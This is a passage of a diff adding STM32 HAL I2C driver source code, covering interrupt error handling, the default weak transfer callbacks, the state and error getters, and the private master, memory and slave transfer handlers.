&& (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_ERR) != RESET)) + { + tmp1 = CurrentMode; + tmp2 = hi2c->XferCount; + tmp3 = hi2c->State; + tmp4 = hi2c->PreviousState; + if ((tmp1 == HAL_I2C_MODE_SLAVE) && (tmp2 == 0U) && \ + ((tmp3 == HAL_I2C_STATE_BUSY_TX) || (tmp3 == HAL_I2C_STATE_BUSY_TX_LISTEN) || \ + ((tmp3 == HAL_I2C_STATE_LISTEN) && (tmp4 == I2C_STATE_SLAVE_BUSY_TX)))) + { + I2C_Slave_AF(hi2c); + } + else + { + /* Clear AF flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_AF); + + error |= HAL_I2C_ERROR_AF; + + /* Do not generate a STOP in case of Slave receive non acknowledge during transfer (mean not at the end of transfer) */ + if ((CurrentMode == HAL_I2C_MODE_MASTER) || (CurrentMode == HAL_I2C_MODE_MEM)) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + } + } + + /* I2C Over-Run/Under-Run interrupt occurred -------------------------------*/ + if ((I2C_CHECK_FLAG(sr1itflags, I2C_FLAG_OVR) != RESET) && (I2C_CHECK_IT_SOURCE(itsources, I2C_IT_ERR) != RESET)) + { + error |= HAL_I2C_ERROR_OVR; + /* Clear OVR flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_OVR); + } + + /* Call the Error Callback in case of Error detected -----------------------*/ + if (error != HAL_I2C_ERROR_NONE) + { + hi2c->ErrorCode |= error; + I2C_ITError(hi2c); + } +} + +/** + * @brief Master Tx Transfer completed callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_MasterTxCpltCallback(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_MasterTxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Master Rx Transfer completed callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_MasterRxCpltCallback(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_MasterRxCpltCallback could be implemented in the user file + */ +} + +/** @brief Slave Tx Transfer completed callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_SlaveTxCpltCallback(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_SlaveTxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Slave Rx Transfer completed callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_SlaveRxCpltCallback(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_SlaveRxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Slave Address Match callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param TransferDirection Master request Transfer Direction (Write/Read), value of @ref I2C_XferDirection_definition + * @param AddrMatchCode Address Match Code + * @retval None + */ +__weak void HAL_I2C_AddrCallback(I2C_HandleTypeDef *hi2c, uint8_t TransferDirection, uint16_t AddrMatchCode) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + UNUSED(TransferDirection); + UNUSED(AddrMatchCode); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_AddrCallback() could be implemented in the user file + */ +} + +/** + * @brief Listen Complete callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_ListenCpltCallback(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_ListenCpltCallback() could be implemented in the user file + */ +} + +/** + * @brief Memory Tx Transfer completed callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_MemTxCpltCallback(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_MemTxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Memory Rx Transfer completed callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_MemRxCpltCallback(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_MemRxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief I2C error callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_ErrorCallback(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_ErrorCallback could be implemented in the user file + */ +} + +/** + * @brief I2C abort callback. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval None + */ +__weak void HAL_I2C_AbortCpltCallback(I2C_HandleTypeDef *hi2c) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2c); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2C_AbortCpltCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup I2C_Exported_Functions_Group3 Peripheral State, Mode and Error functions + * @brief Peripheral State, Mode and Error functions + * +@verbatim + =============================================================================== + ##### Peripheral State, Mode and Error functions ##### + =============================================================================== + [..] + This subsection permit to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the I2C handle state. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval HAL state + */ +HAL_I2C_StateTypeDef HAL_I2C_GetState(I2C_HandleTypeDef *hi2c) +{ + /* Return I2C handle state */ + return hi2c->State; +} + +/** + * @brief Returns the I2C Master, Slave, Memory or no mode. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval HAL mode + */ +HAL_I2C_ModeTypeDef HAL_I2C_GetMode(I2C_HandleTypeDef *hi2c) +{ + return hi2c->Mode; +} + +/** + * @brief Return the I2C error code. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval I2C Error Code + */ +uint32_t HAL_I2C_GetError(I2C_HandleTypeDef *hi2c) +{ + return hi2c->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup I2C_Private_Functions + * @{ + */ + +/** + * @brief Handle TXE flag for Master + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_MasterTransmit_TXE(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + HAL_I2C_ModeTypeDef CurrentMode = hi2c->Mode; + uint32_t CurrentXferOptions = hi2c->XferOptions; + + if ((hi2c->XferSize == 0U) && (CurrentState == HAL_I2C_STATE_BUSY_TX)) + { + /* Call TxCpltCallback() directly if no stop mode is set */ + if ((CurrentXferOptions != I2C_FIRST_AND_LAST_FRAME) && (CurrentXferOptions != I2C_LAST_FRAME) && (CurrentXferOptions != I2C_NO_OPTION_FRAME)) + { + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + hi2c->PreviousState = I2C_STATE_MASTER_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MasterTxCpltCallback(hi2c); +#else + HAL_I2C_MasterTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else /* Generate Stop condition then Call TxCpltCallback() */ + { + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + + if (hi2c->Mode == HAL_I2C_MODE_MEM) + { + hi2c->Mode = HAL_I2C_MODE_NONE; +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MemTxCpltCallback(hi2c); +#else + HAL_I2C_MemTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + hi2c->Mode = HAL_I2C_MODE_NONE; +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MasterTxCpltCallback(hi2c); +#else + HAL_I2C_MasterTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + } + } + else if ((CurrentState == HAL_I2C_STATE_BUSY_TX) || \ + ((CurrentMode == HAL_I2C_MODE_MEM) && (CurrentState == HAL_I2C_STATE_BUSY_RX))) + { + if (hi2c->XferCount == 0U) + { + /* Disable BUF interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_BUF); + } + else + { + if (hi2c->Mode == HAL_I2C_MODE_MEM) + { + I2C_MemoryTransmit_TXE_BTF(hi2c); + } + else + { + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } + } + } + else + { + /* Do nothing */ + } +} + +/** + * @brief Handle BTF flag for Master transmitter + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_MasterTransmit_BTF(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + uint32_t CurrentXferOptions = hi2c->XferOptions; + + if (hi2c->State == HAL_I2C_STATE_BUSY_TX) + { + if (hi2c->XferCount != 0U) + { + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } + else + { + /* Call TxCpltCallback() directly if no stop mode is set */ + if ((CurrentXferOptions != I2C_FIRST_AND_LAST_FRAME) && (CurrentXferOptions != I2C_LAST_FRAME) && (CurrentXferOptions != I2C_NO_OPTION_FRAME)) + { + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + hi2c->PreviousState = I2C_STATE_MASTER_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MasterTxCpltCallback(hi2c); +#else + HAL_I2C_MasterTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else /* Generate Stop condition then Call TxCpltCallback() */ + { + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + if (hi2c->Mode == HAL_I2C_MODE_MEM) + { + hi2c->Mode = HAL_I2C_MODE_NONE; +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MemTxCpltCallback(hi2c); +#else + HAL_I2C_MemTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + hi2c->Mode = HAL_I2C_MODE_NONE; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MasterTxCpltCallback(hi2c); +#else + HAL_I2C_MasterTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + } + } + } + else + { + /* Do nothing */ + } +} + +/** + * @brief Handle TXE and BTF flag for Memory transmitter + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_MemoryTransmit_TXE_BTF(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + + if (hi2c->EventCount == 0U) + { + /* If Memory address size is 8Bit */ + if (hi2c->MemaddSize == I2C_MEMADD_SIZE_8BIT) + { + /* Send Memory Address */ + hi2c->Instance->DR = I2C_MEM_ADD_LSB(hi2c->Memaddress); + + hi2c->EventCount += 2U; + } + /* If Memory address size is 16Bit */ + else + { + /* Send MSB of Memory Address */ + hi2c->Instance->DR = I2C_MEM_ADD_MSB(hi2c->Memaddress); + + hi2c->EventCount++; + } + } + else if (hi2c->EventCount == 1U) + { + /* Send LSB of Memory Address */ + hi2c->Instance->DR = I2C_MEM_ADD_LSB(hi2c->Memaddress); + + hi2c->EventCount++; + } + else if (hi2c->EventCount == 2U) + { + if (CurrentState == HAL_I2C_STATE_BUSY_RX) + { + /* Generate Restart */ + hi2c->Instance->CR1 |= I2C_CR1_START; + + hi2c->EventCount++; + } + else if ((hi2c->XferCount > 0U) && (CurrentState == HAL_I2C_STATE_BUSY_TX)) + { + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } + else if ((hi2c->XferCount == 0U) && (CurrentState == HAL_I2C_STATE_BUSY_TX)) + { + /* Generate Stop condition then Call TxCpltCallback() */ + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MemTxCpltCallback(hi2c); +#else + HAL_I2C_MemTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + /* Do nothing */ + } + } + else + { + /* Do nothing */ + } +} + +/** + * @brief Handle RXNE flag for Master + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_MasterReceive_RXNE(I2C_HandleTypeDef *hi2c) +{ + if (hi2c->State == HAL_I2C_STATE_BUSY_RX) + { + uint32_t tmp; + + tmp = hi2c->XferCount; + if (tmp > 3U) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + + if (hi2c->XferCount == (uint16_t)3) + { + /* Disable BUF interrupt, this help to treat correctly the last 4 bytes + on BTF subroutine */ + /* Disable BUF interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_BUF); + } + } + else if ((hi2c->XferOptions != I2C_FIRST_AND_NEXT_FRAME) && ((tmp == 1U) || (tmp == 0U))) + { + if (I2C_WaitOnSTOPRequestThroughIT(hi2c) == HAL_OK) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + + hi2c->State = HAL_I2C_STATE_READY; + + if (hi2c->Mode == HAL_I2C_MODE_MEM) + { + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->PreviousState = I2C_STATE_NONE; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MemRxCpltCallback(hi2c); +#else + HAL_I2C_MemRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->PreviousState = I2C_STATE_MASTER_BUSY_RX; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MasterRxCpltCallback(hi2c); +#else + HAL_I2C_MasterRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + } + else + { + /* Disable EVT, BUF and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Call user error callback */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->ErrorCallback(hi2c); +#else + HAL_I2C_ErrorCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + } + else + { + /* Do nothing */ + } + } +} + +/** + * @brief Handle BTF flag for Master receiver + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_MasterReceive_BTF(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + uint32_t CurrentXferOptions = hi2c->XferOptions; + + if (hi2c->XferCount == 4U) + { + /* Disable BUF interrupt, this help to treat correctly the last 2 bytes + on BTF subroutine if there is a reception delay between N-1 and N byte */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_BUF); + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } + else if (hi2c->XferCount == 3U) + { + /* Disable BUF interrupt, this help to treat correctly the last 2 bytes + on BTF subroutine if there is a reception delay between N-1 and N byte */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_BUF); + + if ((CurrentXferOptions != I2C_NEXT_FRAME) && (CurrentXferOptions != I2C_FIRST_AND_NEXT_FRAME)) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } + else if (hi2c->XferCount == 2U) + { + /* Prepare next transfer or stop current transfer */ + if ((CurrentXferOptions == I2C_FIRST_FRAME) || (CurrentXferOptions == I2C_LAST_FRAME_NO_STOP)) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + else if ((CurrentXferOptions == I2C_NEXT_FRAME) || (CurrentXferOptions == I2C_FIRST_AND_NEXT_FRAME)) + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + else if (CurrentXferOptions != I2C_LAST_FRAME_NO_STOP) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + else + { + /* Do nothing */ + } + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + + /* Disable EVT and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + hi2c->State = HAL_I2C_STATE_READY; + if (hi2c->Mode == HAL_I2C_MODE_MEM) + { + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->PreviousState = I2C_STATE_NONE; +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MemRxCpltCallback(hi2c); +#else + HAL_I2C_MemRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->PreviousState = I2C_STATE_MASTER_BUSY_RX; +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MasterRxCpltCallback(hi2c); +#else + HAL_I2C_MasterRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + } + else + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + } +} + +/** + * @brief Handle SB flag for Master + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_Master_SB(I2C_HandleTypeDef *hi2c) +{ + if (hi2c->Mode == HAL_I2C_MODE_MEM) + { + if (hi2c->EventCount == 0U) + { + /* Send slave address */ + hi2c->Instance->DR = I2C_7BIT_ADD_WRITE(hi2c->Devaddress); + } + else + { + hi2c->Instance->DR = I2C_7BIT_ADD_READ(hi2c->Devaddress); + } + } + else + { + if (hi2c->Init.AddressingMode == I2C_ADDRESSINGMODE_7BIT) + { + /* Send slave 7 Bits address */ + if (hi2c->State == HAL_I2C_STATE_BUSY_TX) + { + hi2c->Instance->DR = I2C_7BIT_ADD_WRITE(hi2c->Devaddress); + } + else + { + hi2c->Instance->DR = I2C_7BIT_ADD_READ(hi2c->Devaddress); + } + + if (((hi2c->hdmatx != NULL) && (hi2c->hdmatx->XferCpltCallback != NULL)) + || ((hi2c->hdmarx != NULL) && (hi2c->hdmarx->XferCpltCallback != NULL))) + { + /* Enable DMA Request */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + } + } + else + { + if (hi2c->EventCount == 0U) + { + /* Send header of slave address */ + hi2c->Instance->DR = I2C_10BIT_HEADER_WRITE(hi2c->Devaddress); + } + else if (hi2c->EventCount == 1U) + { + /* Send header of slave address */ + hi2c->Instance->DR = I2C_10BIT_HEADER_READ(hi2c->Devaddress); + } + else + { + /* Do nothing */ + } + } + } +} + +/** + * @brief Handle ADD10 flag for Master + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_Master_ADD10(I2C_HandleTypeDef *hi2c) +{ + /* Send slave address */ + hi2c->Instance->DR = I2C_10BIT_ADDRESS(hi2c->Devaddress); + + if (((hi2c->hdmatx != NULL) && (hi2c->hdmatx->XferCpltCallback != NULL)) + || ((hi2c->hdmarx != NULL) && (hi2c->hdmarx->XferCpltCallback != NULL))) + { + /* Enable DMA Request */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + } +} + +/** + * @brief Handle ADDR flag for Master + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_Master_ADDR(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + HAL_I2C_ModeTypeDef CurrentMode = hi2c->Mode; + uint32_t CurrentXferOptions = hi2c->XferOptions; + uint32_t Prev_State = hi2c->PreviousState; + + if (hi2c->State == HAL_I2C_STATE_BUSY_RX) + { + if ((hi2c->EventCount == 0U) && (CurrentMode == HAL_I2C_MODE_MEM)) + { + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + else if ((hi2c->EventCount == 0U) && (hi2c->Init.AddressingMode == I2C_ADDRESSINGMODE_10BIT)) + { + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Restart */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + hi2c->EventCount++; + } + else + { + if (hi2c->XferCount == 0U) + { + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + else if (hi2c->XferCount == 1U) + { + if (CurrentXferOptions == I2C_NO_OPTION_FRAME) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + if ((hi2c->Instance->CR2 & I2C_CR2_DMAEN) == I2C_CR2_DMAEN) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + else + { + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + } + /* Prepare next transfer or stop current transfer */ + else if ((CurrentXferOptions != I2C_FIRST_AND_LAST_FRAME) && (CurrentXferOptions != I2C_LAST_FRAME) \ + && ((Prev_State != I2C_STATE_MASTER_BUSY_RX) || (CurrentXferOptions == I2C_FIRST_FRAME))) + { + if ((CurrentXferOptions != I2C_NEXT_FRAME) && (CurrentXferOptions != I2C_FIRST_AND_NEXT_FRAME) && (CurrentXferOptions != I2C_LAST_FRAME_NO_STOP)) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + else + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + } + else if (hi2c->XferCount == 2U) + { + if ((CurrentXferOptions != I2C_NEXT_FRAME) && (CurrentXferOptions != I2C_FIRST_AND_NEXT_FRAME) && (CurrentXferOptions != I2C_LAST_FRAME_NO_STOP)) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Enable Pos */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + + if (((hi2c->Instance->CR2 & I2C_CR2_DMAEN) == I2C_CR2_DMAEN) && ((CurrentXferOptions == I2C_NO_OPTION_FRAME) || (CurrentXferOptions == I2C_FIRST_FRAME) || (CurrentXferOptions == I2C_FIRST_AND_LAST_FRAME) || (CurrentXferOptions == I2C_LAST_FRAME_NO_STOP) || (CurrentXferOptions == I2C_LAST_FRAME))) + { + /* Enable Last DMA bit */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_LAST); + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + if (((hi2c->Instance->CR2 & I2C_CR2_DMAEN) == I2C_CR2_DMAEN) && ((CurrentXferOptions == I2C_NO_OPTION_FRAME) || (CurrentXferOptions == I2C_FIRST_FRAME) || (CurrentXferOptions == I2C_FIRST_AND_LAST_FRAME) || (CurrentXferOptions == I2C_LAST_FRAME_NO_STOP) || (CurrentXferOptions == I2C_LAST_FRAME))) + { + /* Enable Last DMA bit */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_LAST); + } + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + + /* Reset Event counter */ + hi2c->EventCount = 0U; + } + } + else + { + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } +} + +/** + * @brief Handle TXE flag for Slave + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @retval None + */ +static void I2C_SlaveTransmit_TXE(I2C_HandleTypeDef *hi2c) +{ + /* Declaration of temporary variables to prevent undefined behavior of volatile usage */ + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + + if (hi2c->XferCount != 0U) + { + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferCount--; + + if ((hi2c->XferCount == 0U) && (CurrentState == HAL_I2C_STATE_BUSY_TX_LISTEN)) + { + /* Last Byte is received, disable Interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_BUF); 